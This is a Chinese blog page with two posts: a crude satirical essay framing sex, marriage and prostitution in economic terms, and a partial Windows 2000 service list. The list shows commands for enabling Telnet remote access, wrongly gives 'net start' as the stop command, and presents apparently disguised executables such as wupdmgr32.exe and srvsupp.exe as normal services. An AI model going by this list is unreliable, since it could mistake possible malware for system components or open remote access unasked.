2005年05月27日

(一)
对我来说,性是一种珍贵的稀缺资源,当然,我指的是性生活,而不是性别,性别我自
己也有一个,这是我快乐和烦恼的根源,用经济学的术语说,就是成本,这成本在有生
之年能给我创造多大的价值和效益,或者赔个一毛不剩,变成呆坏帐和闲置资产,我心
中还十分没底。


波茨纳说,性是人类理性的实现。这句话可以这么理解:如果我知道茱迪?福斯特染上
了艾滋病,那么不管我多么仰慕她,也不会跟她上床,这事风险太大。这说明做爱本身
就是一种经济行为,有需求,有供应,有风险,有收益,还要计算投入产出比,芝加哥
学派代表人物贝克尔断定:上帝目光所及,皆可交易,那么毫无疑问,深藏床帷之后的
性爱和农贸市场上的萝卜具有某种共性,这也符合波普艺术家们的价值观,1954年艾伦
?金斯伯格接受记者采访,说世上并无尊卑,如果有不平等,那也只是价格上的不平
等。我觉得既然谈到价格,那其实还是一种平等——钞票面前人人平等,比如香港的淫
媒组织就曾经列过一张菜单,把演艺界的女明星一网打尽,我心中的那些偶像,从清纯
玉女到三级肉弹,谁值多少钱标得清清楚楚,如果我手上有一亿美元,那感觉就象走进
了超市。


不考虑宗教信仰和道德的负面影响,那么一次单纯的、形而上的性爱就是一个契约,酒
店里的桑拿小姐问先生要不要服务,可以视为一个要约邀请,至于老婆掐着老公的脖子
发令:官人,我要!就明显是一个标准合同,不明白标准合同的朋友们可以这么理解:
虽然你反对手机双向收费,也不满意中国电信的服务,但你还是要入他们的网。


合同订立后的性爱象一单混合了FOB和CIF特征的国际贸易,FOB的意思是船上交货,货
物在越过船舷之前,发生任何毁损灭失、遗弃泄露都不能算是交易成功,失败后的男人
们一个个垂头丧气、额头冒汗,这充分说明做爱是一种高风险的活动,而“哪里有风
险,哪里就有保险”,于是就有了杜蕾丝、拉士丁和杰士邦这些品牌,根据弗里德曼的
“假设不相关论题”,我们可以断定杜蕾丝和中国人寿作的是同样的生意,而第一个把
避孕套叫作“保险套”的人堪称伟大,他要不是天才,就一定是个经济学家。CIF术语
指的是货主承担成本、保险费和运费,所以到药店里买避孕套的大多都是男性,交易过
程中,出力最多、忙前忙后的大多也是男性,货主嘛,规定要承担运费的。


如果探究到细节,性爱合同比其它合同更加完备:除了交货、验收,它还有交易后的信
息反馈机制,电影《一声叹息》里,张国立问刘蓓:好不好?刘蓓娇喘一声:好死了。
看得人心潮激荡。当然,这种反馈机制并不能保证信息的完全对称,上海有个美女写了
一篇文章,大标题就是:《伪装高潮也快乐》,这明显是在号召提供虚假信息,如果这
种作法如果被会计师事务所学了去,必然会引发信用危机,严重打击投资者的信心。我
在此要引用的第二个案例是美林证券,这家世界闻名的证券公司因为提供虚假投资评
估,2002年被罚了一亿美元,那笔钱如果给我,我就有能力去逛逛超市了。


(二)
对体制内的交易双方来说,性象一块永远嚼在口里的口香糖,它的好处是随时都东西让
你咬,不至于空虚,不至于闲得牙疼;缺点是越嚼越无味,到最后就成了一种纯粹的习
惯。“七年之痒”的说法,不仅说明消费者对单一产品、无差别服务的厌倦,也证明了
性资源使用中的边际效用递减:最开始拉拉手精神抖擞,亲一下浑身颤抖,但后来拉得
越多、亲得越多,这事就越没有吸引力,美国一个无聊的民间调查机构统计了三百多对
夫妻的睡姿,最后得出结论:婚龄半年以内的夫妻,大多是面对面搂抱着睡,婚龄超过
2年的,几乎百分百是背对背睡。这些姿势和体位,我们可以看作是人性化的市场需求
信息。还有一位专攻下三路的诗人说,他在婚姻中唯一获得的“体制性的阳痿”,看来
他需要到消费者协会去投诉。


康德认为婚姻的意义就在于“合法使用对方的性器官”,薛兆丰说婚姻是“终生批发的
期货合同”,这些都说明婚姻是一个规模经济,规模经济与单干户相比,优势主要在于
两点:一是成本小,没结婚的两个人需要两张床,结了婚就只需要一张;二是可比价格
低,香港报纸上有很多色情广告,广告卖点多是皮肤、身材,或者武功,从来没见过有
小姐宣称自己价格低,“跳楼价、大出血、拆迁甩卖”什么的,因为她们知道自己在这
方面没有优势——老婆是不用花钱的,所以只好在差别化服务上作文章。


性市场大概是唯一一个供应不足的买方市场,一方面,小姐们纷纷抱怨“生意越来越难
做”,另一方面,体制内外的男人们都在进行着DIY,这情形有点象我们经历过的“以
计划经济为主,市场经济为辅”。我表哥那时候曾因为“投机倒把”坐了几年牢,出来
后赚了一点钱,据说养了好几个二奶,然后我表嫂就开始留指甲,时常偷袭他。这两种
审判说明投机倒把始终是一种背德恶行,而走私更加不可饶恕。但根据我表哥的供述,
他也确实值得原谅,我表嫂出身名门,教养过人,对做爱有近乎苛刻的要求:要洗澡,
要关灯,要遵循法定程序,要正面交流,决不可暗度陈仓,等等。这大大提高了他们之
间的交易成本,用经济学的术语讲,就是高关税壁垒,我表哥不懂经济学,他用最朴素
的话表达他的意见:真他妈没意思。其实他讲的是一个利润问题。


张五常在中山大学演讲时,说交易成本越高,人就越穷,交易成本降低一点点,人民生
活就会快乐很多。这话简直就是我说的。法国人心中的完美妻子是“客厅里的贵妇、卧
室里的荡妇、起居室里的仆妇”,这其实也是在响应张先生的理论:降低交易成本。我
表嫂因为她长期供应的质次价高的性产品,终于在1999年被我表哥取消了交易资格,他
们离婚了。这对一直持币待购的投资者,我,是一个沉重打击,从那以后我见人就说我
是一个独身主义者。


(三)
前些日子各地都有“换妻俱乐部”的报道,我这个人有点趣味低下,遇到这样的新闻,
总要反来复去地看。《圣经》上说“亲近邻舍之妻的,不免受罚”,所以搞换妻俱乐部
的这些家伙,最后全都被捉将官里去,打板子,捱班房,我是一个独身主义者,没资格
参与这种非法活动,见了总不免有点幸灾乐祸。
换妻这事可以算是一种等价交换,稍具经济学常识的人都知道,交换是一种增值行为,
农民拿粮换布,是因为他织布要比种粮食花更多的时间,这种交易让他节约了时间。由
于没有人想作亏本买卖,所以换妻肯定也是一种增值行为,前面说过了,夫妻之间有个
“性的边际效用递减”问题,“李杜诗篇万口传,至今已觉不新鲜,”而换妻则可以解
决生产中的设备老化问题,以自己的不新鲜换别人的新鲜,使效用大大提高。萨缪尔森
有个幸福公式:幸福=效用/欲望,在欲望不变的情况下,效用越高,就越幸福。所以换
妻事实上是一件幸福的事,但这结论显然不符合上帝的旨意。


经济学中有个名词叫“帕累托优化”,是指在资源分配中,不损害他人福利而进一步改
善自己的福利,1980年华罗庚数学竞赛有这样一道题目:大家排队取水,桶各有大小,
怎样排列才能保证总体效率最高?答案很明显:小桶在前,大桶在后。但这损害了大桶
者的利益,所以它是一个伪帕累托。阿瑟?奥肯1975年的“漏桶试验”,损害富人的利
益来帮助穷人,是另一个著名的伪帕累托。照我看世间真正的帕累托优化不多,而换妻
就是一个。它没有损害任何人的利益——大家自愿,换过后也不影响使用,但每个人得
到的效用都大大提高,当然这里必须排除性病传染的因素。


几单位的性资源换一辆保时捷,可能大多数人都觉得不值,也付不起,香港某位著名女
星还换了一套几千万的豪宅呢,你怎么说。不过这也正常,交换总会有价格问题,电影
《不道德的交易中》,黛咪摩尔的老公拿她换了一百万美元,事后十分痛苦,觉得这生
意不划算,如果他换来的不是一堆钱,而是别人的老婆,想来就会好过一些。


换妻应该算是男人的恶行,网上有些女网友评论,说这样的男人真恶心,拿老婆当玩
物。这话看似偏激,实则非常接近真理——性其实就是种物权。物权的一个重要特征就
是排他性,你买了一只锅,这只锅就只属于你自己,别人不能轻易碰。性也是这样,尽
管老婆大多时候都闲着,但谁也不会让别人轻易使用,也许变态会这么干,但我从没见
过。再说说网上评论的事,女网友评论完了,有个男网友在后面骂,骂得十分提神:三
八,你们怎么不说那些当老婆的,她们不也在换夫吗?
当然,换妻这事最终是个道德问题。经济学要不要兼顾道德,经济学家们也一直在吵个
不停。但道德这东西谁能说得清呢,除了上帝。宗教主义者认为上帝是人类最终的理
性,这话可以跟波茨纳那句“性是人类理性的实现”联系起来理解。《圣经》里是这么
说的:“艳丽是虚假的,美容是虚浮的,惟敬畏耶和华的妇女值得称赞。”这话有点费
解,如果我有个老婆,让她怕耶和华我没意见,但非要她敬他爱他,我就觉得他是在占
我便宜,单方面的我不干,要就换妻。


(四)
按古龙的说法,性产业是最古老的职业,“堪为百代祖师”,那时候没有钞票,人们拿
贝壳换粮换米,我怀疑有些人收藏贝壳就是想回到原始社会。根据伪学者慕容雪村的考
证,“性”这东西可以算是另一种贝壳,每一单位的性资源换多少张狍子皮,换几捧高
梁米,大概早有定数。即使到了现代社会,性依然是万能结算工具,可以换彩电,换房
子,换工作,换城镇户口,有个美女还拿它换了一个法官当。所以英国前首相狄斯赖利
说“货币比唯一比爱情更让人发狂的东西”,这里的“货币”如果不是指性资源,我就
觉得不大好理解。


站在动物的立场,人类的性压抑、性苦闷实在是不可理解,93年春天我去北京动物园
玩,看见一只老虎四脚乱跳,咆哮不止,据说是发情使然。想想这些动物们也真可怜,
一年只有那么一季,还不容易遇见合适的对象,茫茫林海,真爱何求啊。人类就不一
样,一年到头都不闲着,自带设备搞生产,方便又轻松,资源又丰富,没有稀缺性。经
济学中的“稀缺性”指的是对需求而言,资源总是有限的、不足的。这种理论应该不适
用于性资源,人类的性需求十分有限,“百年三万日”,这数字大概可以算是人类的极
限,即使威猛强悍如张伯伦,也有支撑不住的时候。与这有限的需求相比,人类拥有的
性资源可以算是无穷无尽的,50亿人口中有一半都是异性,如果我们也是老虎,肯定用
不着四脚乱跳,咆哮不止。


一个开放的性市场需要制定交易规则,这是套用康芒斯的话。为了避免性市场陷入萧
条,政府应当以行政干预拉动需求,比如对性产业免税等等,这大概可以算是凯恩斯主
义者的观点。不过在现阶段的中国,康芒斯和凯恩斯们都无用武之地,性产业不合法,
从业者只好在地下状态左躲右闪,偶尔生产,这显然不符合规模经济的要求。就象爱伦
?坡的诗:被光明弃绝/向幽暗中寻找自我。这诗是我查字典翻译的,不知道译得对不
对,但2000年我曾见过一个被收容的姑娘,她这样对警察说:找不到工作,摆个摊你们
又要没收,不干这个干什么?那姑娘如果会用英文写诗,中国可能要多一位女文豪。


红灯区合法化的问题,在全世界都有争论,反对者认为性产业合法化会导致伦理危机,
上帝是这么说的,“妓女如深坑…她埋伏好象强盗,她使人多有奸诈。”上帝的比喻总
是很形象。除此之外上帝还说了一句:“与妓女结交的,浪费钱财,”事实上有钱不用
才是恶行,因为那将导致经济危机,否则政府拼命拉动内需干什么。18世纪初,英国医
生伯纳德?曼德维尔写过一首诗叫《蜜蜂的寓言》,说节约并非美德,奢侈浪费才是致
富之道,这诗对凯恩斯有莫大影响,但明显跟上帝过不去,所以被禁了好几百年。反对
者的第二个理由是性病,认为红灯区合法化就是性病泛滥的前兆,这话也有事实依据,
比如泰国就有爱滋病泛滥的问题。


我个人倒是赞成合法化,但谁如果认为我这是为了自己嫖娼方便,我也无话可说。我的
观点是这样的:既然不可能禁绝,不如拿它来赚钱。一个阵地,政府不去占领,黑社会
就必然去占领。钱在政府手里和在黑社会手里哪个更能为广大人民造福,这事不好说,
但逃税总不是美德。至于“伦理危机”,我看就是个幌子,陀斯妥耶夫斯基的小说《卡
拉马佐夫兄弟》中,米蒂亚这样告诉阿辽沙:关于伦理学,我没法对你解释清楚。根据
我的个人经验,所有解释不清楚的东西都会成为幌子,比如雷公电母、狐仙和柳树精,
乡村巫医们靠着这些发了老鼻子财了,但最大的一个幌子就是所谓的伦理道德。再说说
泰国的爱滋病,据我分析它不是红灯区合法化的问题,只是政府管理不当,如果不合
法,可能传染得更厉害。众所周知,地下状态什么东西都传播得快,比如小道消息、黄
段子,还有SARS。


上世纪九十年代,荷兰鹿特丹曾打击过色情行业,结果政府税收锐减了几亿盾。据说太
原也有这种情况,但身边的事不好说,我们还是说别人吧。

(五)
作为一名独身主义者,我坚决认为婚姻是个赔本买卖。首先它的机会成本太高,我们形
容某人得不偿失,常说他“捡了芝麻,丢了西瓜”,那么结婚就是捡了一粒芝麻,却丢
了一个谷仓。投资理论讲“不能把所有的鸡蛋放在一个篮子里”,而结婚显然是违背了
投资理论,你把所有的蛋都放了进去,最后却未必就能孵出小鸡鸡来,弄不好连蛋都要
打破。前些日子广东有个案例:有个人在外面包了个二奶,老婆发现后怒不可遏,一刀
将他的作案工具割下来扔进了马桶,连生产设备都报废了,可以算是鸡飞蛋打的典型。
同例我们还可以参照美国歌星迈克尔?杰克逊,他现在一年要付给前妻300万美元,有一
次差点就破了产。


说起婚姻的实质,连我这个独身主义者都替你们难过。人类的性供应时间不长,20岁开
张,60岁打烊,也就40年左右的时间,听说有人七十多岁还能搞批发,我觉得那肯定是
部长以上级干部,全靠补药顶着,要不然就是su-su-super猛男。40年是14000天,按三
天一次计,人一辈子能消费的性资源不过4600单位。如果不生孩子,也不谈爱情,那么
结婚其实就是为了这4600次。“我能想到最浪漫的事,就是和你一起慢慢变老”,细细
分析起来这事其实并不怎么浪漫,白首偕老,终生相伴,不过是4600次活塞运动的另一
种说法。为了使问题更好理解,我们对结婚的成本进行实证分析:


一、结婚的直接成本。北京人结婚时,前来道贺的小伙子会这么唱:“结婚了吧,傻冒
了吧,一个人挣钱两个人花……”可见结婚要付出50%的收入,即使离婚也要按这个标
准来分割共同财产。根据莫迪利阿尼的生命周期假说,消费取决于人一生的收入,我们
假设一个人月收入1000元,工作40年的总收入是48万。48万一半自己用,一半拿来跟老
婆换那4600次,平均每次也就是52块多。在这个问题上富人比穷人吃亏更大一些,如果
月收入一万,那么性交的单价就是500多,据说莫斯科四星级酒店里就是这个价格,所
以富人容易包二奶,因为每多包一个,他的成本就会降低一倍,由此我们可以得出一个
结论:决定夫妻关系并不是所谓的道德伦理,而是供需关系。如果你不巧是比尔?盖
茨,那就太惊人了,按上述计算方式,你跟老婆亲热一次的价格是1100万美元,这钱如
果买成猪肉,可以买16,000,000斤。
二、结婚的简接成本。胡塞尔说真正的自由主义是不结婚的,这说明结婚要损失自由,
裴多菲有诗道:为了自由,生命也可抛,爱情也可抛,可见自由是无价的,除了这无价
的自由,你还必须在婚姻生活中花费大量的个人时间,比如陪老婆逛街,或者陪老公打
麻将,这时间也是金钱;有人婚后感情不好,喜欢跟老婆吵架,说不定还要发生武斗,
但不管是打坏了老婆,还是被老婆打坏,都要付出修理成本;如果被抓伤了脸,还要编
谎话请假,产生误工成本;如果老婆一气之下回了娘家,你可能要磨破几双皮鞋,经济
学中把这种成本叫作“皮鞋成本”。


这么说来,婚姻就是一个大竹杠。批发本来应该比零售便宜,我们都知道商业采购的原
理是“批量越大,成本越低”,现在可好,你一下子全包了,结果还被人狠狠敲了一竹
杠。


当然,婚姻还有其他的价值,比如社科院的一个博士就说婚姻是人类繁衍的工具。我不
大赞同这种说法,据我所知,人类繁衍靠的是性器官,而不是靠结婚证书。否则你去领
个结婚证,再回家把那什么割了,看看能不能生出孩子来。要是生得出来,我情愿输你
一本《葵花宝典》。照我看,婚姻不仅不能保证繁衍,反而大大有害于人类繁衍,我们
都知道杂交水稻好,不仅长得壮,产量也高,五八年的时候据说一亩地能打几十万斤。
而结婚即使有一千种好处,也掩盖不了这个致命的缺点:在婚姻的稻田里,你永远没法
培育杂交品种。


(六)
在自由放任的经济理论之前,经济学的一个重要任务是怎样增加生产,避免出现饥荒。
我们都知道,饥荒是生活基本资料,尤其是粮食的供应不足引起的,三年困难时期,因
为高估产、高征收,再加上大办人民公社的过度浪费,弄得老百姓连饭都吃不上,活活
饿死了几千万人。
性爱市场也会产生供应不足的问题,对男性来说,女方不断提升的性技术、不断扩大的
性需求真是个灾难。据说有个丈夫天天在汤里放安眠药,让老婆一吃完就呼呼大睡,不
去想性供应和性需求的事,这法子可能有效,但实在是有点缺德:你万一把人家吃傻了
怎么办?


供应不足如果严重了就会发生饥荒,有饥荒就会有逃荒者,这事就叫红杏出墙。平常人
们对逃荒者总是很同情,除了安徽凤阳在1961打击过要饭的,说他们影响了社会主义的
大好形象,捉进去吊起来打,此外还真没见过这么没人性的。但对性爱逃荒者,人们却
一直都很鄙视,说她们淫荡、道德沦丧、不守妇道,它的代表人物就是潘金莲,人家不
过就是在饥荒时吃了几口别人家的饭,就被道德学家们骂了一千多年,骂得人人自危,
连慕容雪村这么大胆的人都有点哆嗦。这事其实是一个产权不清的问题,跟我们的国企
改革差不多:潘金莲有没有权利按照她自己的意愿分配她的性资源?或者说,究竟谁是
潘金莲性工厂的真正所有者?是她自己,还是武大郎?按照所有权与经营权分离的原
则,武大郎最多只有经营权,但你们非要连所有权都夺去,我觉得这中间一定有什么猫
匿,建议清河县反贪局介入调查。


我在企业里管过采购工作,一般情况下我都会选一家固定的供应商,定点采购的好处就
是成本低、供应及时。但如果这家供应商供不上货,那我就要多找两家,这和潘金莲做
的没什么区别,也没见谁说我淫荡或者道德沦丧。所以在这个问题上我有点同情潘金
莲,她和我一样都是优秀的采购员,关注采购质量,寻求足量、及时的供应,但我又加
薪又升职,过得滋滋润润,潘采购却被公安局长武松一刀砍了,其间的迹遇,真是令人
不胜嘘嘘。


前面说过了,经济学有时要研究如何增加生产,在这个问题上,经济学家和管理学家们
有很多理论,比如提高劳动生产率,延长作业时间,还有费亨氏理论、德罗定律什么
的,金正日将军提出还要有艰苦奋斗的精神,但我认为最重要的还是科学技术,所以西
门庆买了两个银托子,所以印度神油和龟鳖丸才会那么畅销,社会学家说性药泛滥是一
个社会道德沦丧的标志,我觉得这事跟道德关系不大,我们卖春药只不过是为了避免饥
荒,而众所周知,搞出饥荒可实在算不上什么道德高尚。


科技是第一生产力。但说也奇怪,性工业应用科技不是为了提高生产效率,反而是为了
降低生产效率。说起“效率”这个词人人都明白,就是用最少的时间做一件事,比的是
谁更快,而在性爱问题上,人们却总想用最多的时间做那件事,比的是谁更慢。


(七)   
“作爱”是个动宾词组。根据我的观察,男性和女性对这个词的理解不大一样,男性偏重于那个动词,女性偏重于后面的名词。由此引发的逻辑是:如果“作”是重要的,那么跟谁“作”就可以忽略;反过来,如果“爱”是重要的,那么显然只能跟固定的对象“作”。

  
这个问题涉及到我们对“性解放”的理解。一谈性解放,很多人都要皱眉,说那是资本主义社会腐朽堕落的象征,这明显是把“性解放”跟“性泛滥”混淆了。事实上性解放是一个挺不错的事,第一是消除性别歧视,第二是把人从宗教的禁锢中解脱出来,让性真正成为取悦身体的工具。这两件事哪件都不坏。有个保守主义学者反对这第二条,说性应该与婚姻有关,是人类自我繁衍的工具云云,我觉得这其实是在把人当骡子看。如果只为了生孩子才交配,那么人跟牲口有什么区别。另外现在也计划生育了,活好几十年,只准来那么一次,未免太不人道。所以说这人应当被送到维多利亚时期去,众所周知,那时候连鸡胸脯都不准说,叫作白肉。丘吉尔就犯过这个错误,被一位夫人斥责,后来他给这位夫人送了一朵兰花,说如果你将它别在你的“白肉”上,将是我莫大的荣耀。

  
再说说“作爱”这个词,如果光“作”不“爱”,那么它有一个大概的价格。这个我们前面讲过了,从几十元到几分之一辆保时捷,不同类型的的产品有不同的价格策略。“爱”字就要复杂一些,有人说它是无价的,有人说它其实也很便宜,根据贝克尔的观点,万物皆可交易,即然什么都可以交易,那么就没有无价的东西。但究竟爱情值多少钱,一句话两句话也说不清楚,我们还是要进行实证分析。

  
在实际调查中,我拿这个问题问过6 个人:假设你很爱你老公,给你多少钱,你会背叛他一次?这背叛当然是指身体上的背叛。从100 万开始,所有人都点头;到50万,有一个人表示不行,这说明她爱她老公大于爱50万,但小于爱100 万,我们取中间值:75万;到20万,又一个人表示不行,那么她的爱情大约值35万;再往下问,在10万元价位上有两个人退出,我们算作是两个15万;等到了5 万元,最后的两个也无法接受,根据上述计算方法,是两个7 万5.这六位女性的爱情总值是155 万,平均价格是26万不到。她们都是白领,月收入在3000到8000元之间,我们也取中间值:5500,那么26万相当于47个月的收入。稍具经济学常识的人都明白,上面提到的价格不是纯粹的零售价,而是一种机会成本,也就是说,为了获得这26万,她们必须抛弃些别的什么,要承担风险,如果被老公发现了,不仅要失去老公的爱情,还要失去老公能给她的那一部分钱,如果这钱大于26万,那么此人的爱情很可能就是个负值。用经济学的术语讲,叫作负价格;用商业术语讲,叫作无偿赠送;用我们的俗话说,这就叫倒贴。一钱不值。

  
我是在深圳进行上述调查的,深圳物价指数之高,是谁都知道的事实。如果换在别的城市,这价格很可能还要打折。我们甚至可以根据全国的物价水平,列出一张爱情价格表,沿海富庶地区的爱情贵一些,内陆穷一点的省份就便宜一些。所以内地的漂亮姑娘都爱找沿海的男人,用经济学的术语讲,这就叫作要素禀赋。

  
这种统计肯定不够严谨,但可以说明一个基本事实:爱情是有价的。另外,爱情肯定与一个人的收入水平有关,收入越低,爱情就越便宜,只有亿万富婆的爱情才可能价值连城。这里也有一个问题,我们都知道,爱情是两个人的事,是个双务合同,光剃头挑子一头热还不行。即使一个人的爱情价值连城,如果她老公拿着不当一回事,那买卖还是做不成。这道理就象两口子卖车,女的说给我多少钱都不卖,男的说一块钱您就拿走,你说这车它值多少钱?

  
这种结果很难让人接受。在我们的观点里,爱情是无比美好的东西,它甚至是我们俗世生活的信仰,怎么可以象萝卜白菜一样,摆在柜台上任人挑拣?怎么可以用钱来衡量,有钱人拿贵的,而我们穷人,就只配拥有那些一钱不值的烂货?它应当超越金钱啊。

  
这里有一个关键问题:身体的偶尔出格是否就等于背叛爱情?如果不是,那么我们上面的分析就不能成立,那个26万就不是爱情的价格,而是婚外性行为的价格。如果坚持认为两者是一回事,那么毫无疑问,你的爱情即使超越了26万,也没什么了不起的,谁还没见过钱啊。另外还有一个问题:如果身体的放纵算是背叛爱情,那么思想上的放纵是不是就更严重?我在四川的时候学会了一个词,叫打望,打望就是在街头观看美女的意思,我承认我在打望时有过非份之想,按照我们上面的分析,这就叫作亵渎爱情。打望这事不大好管,除非你每次上街都戴个眼罩。话说回来,如果连打望的权利都取消了,那还真不如直接给我一刀。
  

翁倩玉唱道:爱是love,爱是amour ,爱是人类最美丽的语言,爱是正大无私的奉献。要我看,如果正大的爱情真是那么美,那一定跟性无关,不会因为偶尔的放纵就收回去。否则那就不是无私奉献,而是倒贴!

2005年05月25日

WIN2000提供服务的列表,包括详细的描述,服务名称,显示名称,可执行文件的路径!
在命令提示符下可以启动,停止下面的服务。
net start 服务名称
net start 停止服务
例:
net start Telnet
开启了Telnet服务,我们就可以用:telnet ip
net start Telnet
停止Telnet服务
=========================================================================
服务名称:Alerter
显示名称:Alerter
描述:通知所选用户和计算机有关系统管理级警报。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称:AppMgmt
显示名称:Application Management
描述:提供软件安装服务,诸如分派,发行以及删除。
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称:Ati HotKey Poller
显示名称:Ati HotKey Poller
描述:[]
可执行文件的路径:C:\WINNT\System32\Ati2evxx.exe
服务名称:ClipSrv
显示名称:ClipBook
描述:支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页面。
可执行文件的路径:C:\WINNT\system32\clipsrv.exe
服务名称:EventSystem
显示名称:COM+ Event System
描述:提供事件的自动发布到订阅 COM 组件。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称:Browser
显示名称:Computer Browser
描述:维护网络上计算机的最新列表以及提供这个列表给请求的程序。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称:Dhcp
显示名称:DHCP Client
描述:通过注册和更改 IP 地址以及 DNS 名称来管理网络配置。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称:TrkWks
显示名称:Distributed Link Tracking Client
描述:当文件在网络域的 NTFS 卷中移动时发送通知。
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称:MSDTC
显示名称:Distributed Transaction Coordinator
描述:并列事务,是分布于两个以上的数据库,消息队列,文件系统,或其它事务保护资源管

理器。
可执行文件的路径:C:\WINNT\System32\msdtc.exe
服务名称:Dnscache
显示名称:DNS Client
描述:解析和缓冲域名系统 (DNS) 名称。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称:Eventlog
显示名称:Event Log
描述:记录程序和 Windows 发送的事件消息。事件日志包含对诊断问题有所帮助的信息。您

可以在“事件查看器”中查看报告。
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称:Fax
显示名称:Fax Service
描述:帮助您发送和接收传真
可执行文件的路径:C:\WINNT\system32\faxsvc.exe
服务名称:MSFTPSVC
显示名称:FTP Publishing Service
描述:通过 Internet 信息服务的管理单元提供 FTP 连接和管理。
可执行文件的路径:C:\WINNT\System32\inetsrv\inetinfo.exe
服务名称:IISADMIN
显示名称:IIS Admin Service
描述:允许通过 Internet 信息服务的管理单元管理 Web 和 FTP 服务。
可执行文件的路径:C:\WINNT\System32\inetsrv\inetinfo.exe
服务名称:cisvc
显示名称:Indexing Service
描述:本地和远程计算机上文件的索引内容和属性;通过灵活查询语言提供文件快速访问。
可执行文件的路径:C:\WINNT\System32\cisvc.exe
服务名称:Irmon
显示名称:Infrared Monitor
描述:支持安装在这台计算机上的红外设备并且检测在有效范围内的其它红外设备。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称:SharedAccess
显示名称:Internet Connection Sharing
描述:为通过拨号网络连接的家庭网络中所有计算机提供网络地址转换、定址以及名称解析服

务。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称:PolicyAgent
显示名称:IPSEC Policy Agent
描述:管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
可执行文件的路径:C:\WINNT\System32\lsass.exe
服务名称:dmserver
显示名称:Logical Disk Manager
描述:逻辑磁盘管理器监视狗服务
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称:dmadmin
显示名称:Logical Disk Manager Administrative Service
描述:磁盘管理请求的系统管理服务
可执行文件的路径:C:\WINNT\System32\dmadmin.exe /com
服务名称:Messenger
显示名称:Messenger
描述:发送和接收系统管理员或者“警报器”服务传递的消息。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称:MSUpdate
显示名称:Microsoft Windows Update Service
描述:Microsoft(R) Windows Update
可执行文件的路径:C:\WINNT\System32\wupdmgr32.exe
服务名称:Netlogon
显示名称:Net Logon
描述:支持网络上计算机 pass-through 帐户登录身份验证事件。
可执行文件的路径:C:\WINNT\System32\lsass.exe
服务名称:mnmsrvc
显示名称:NetMeeting Remote Desktop Sharing
描述:允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。
可执行文件的路径:C:\WINNT\System32\mnmsrvc.exe
服务名称:Netman
显示名称:Network Connections
描述:管理“网络和拨号连接”文件夹中对象,在其中您可以查看局域网和远程连接。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称:NetDDE
显示名称:Network DDE
描述:提供动态数据交换 (DDE) 的网络传输和安全特性。
可执行文件的路径:C:\WINNT\system32\netdde.exe
服务名称:NetDDEdsdm
显示名称:Network DDE DSDM
描述:管理网络 DDE 的共享动态数据交换
可执行文件的路径:C:\WINNT\system32\netdde.exe
服务名称:NtLmSsp
显示名称:NT LM Security Support Provider
描述:为使用传输协议而不是命名管道的远程过程调用(RPC)程序提供安全机制。
可执行文件的路径:C:\WINNT\System32\lsass.exe
服务名称:SysmonLog
显示名称:Performance Logs and Alerts
描述:配置性能日志和警报。
可执行文件的路径:C:\WINNT\system32\smlogsvc.exe
服务名称:PlugPlay
显示名称:Plug and Play
描述:管理设备安装以及配置,并且通知程序关于设备更改的情况。
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称:Spooler
显示名称:Print Spooler
描述:将文件加载到内存中以便迟后打印。
可执行文件的路径:C:\WINNT\system32\spoolsv.exe
服务名称:ProtectedStorage
显示名称:Protected Storage
描述:提供对敏感数据(如私钥)的保护性存储,以便防止未授权的服务,过程或用户对其的非

法访问。
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称:RSVP
显示名称:QoS RSVP
描述:为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。
可执行文件的路径:C:\WINNT\System32\rsvp.exe -s
服务名称:RasAuto
显示名称:Remote Access Auto Connection Manager
描述:无论什么时候当某个程序引用一个远程 DNS 或 NetBIOS 名或者地址就创建一个到远程

网络的连接。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称:RasMan
显示名称:Remote Access Connection Manager
描述:创建网络连接。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称:RpcSs
显示名称:Remote Procedure Call (RPC)
描述:提供终结点映射程序 (endpoint mapper) 以及其它 RPC 服务。
可执行文件的路径:C:\WINNT\system32\svchost -k rpcss
服务名称:RpcLocator
显示名称:Remote Procedure Call (RPC) Locator
描述:管理 RPC 名称服务数据库。
可执行文件的路径:C:\WINNT\System32\locator.exe
服务名称:RemoteRegistry
显示名称:Remote Registry Service
描述:允许远程注册表操作。
可执行文件的路径:C:\WINNT\system32\regsvc.exe
服务名称:NtmsSvc
显示名称:Removable Storage
描述:管理可移动媒体、驱动程序和库。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称:RemoteAccess
显示名称:Routing and Remote Access
描述:在局域网以及广域网环境中为企业提供路由服务。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称:seclogon
显示名称:RunAs Service
描述:在不同凭据下启用启动过程
可执行文件的路径:C:\WINNT\system32\services.exe
服务名称:SamSs
显示名称:Security Accounts Manager
描述:存储本地用户帐户的安全信息。
可执行文件的路径:C:\WINNT\system32\lsass.exe
服务名称:lanmanserver
显示名称:Server
描述:提供 RPC 支持、文件、打印以及命名管道共享。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称:Service Support
显示名称:Service Support
描述:Windows Service Support
可执行文件的路径:C:\WINNT\System32\srvsupp.exe
服务名称:SMTPSVC
显示名称:Simple Mail Transport Protocol (SMTP)
描述:跨网传送电子邮件
可执行文件的路径:C:\WINNT\System32\inetsrv\inetinfo.exe
服务名称:SCardSvr
显示名称:Smart Card
描述:对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。
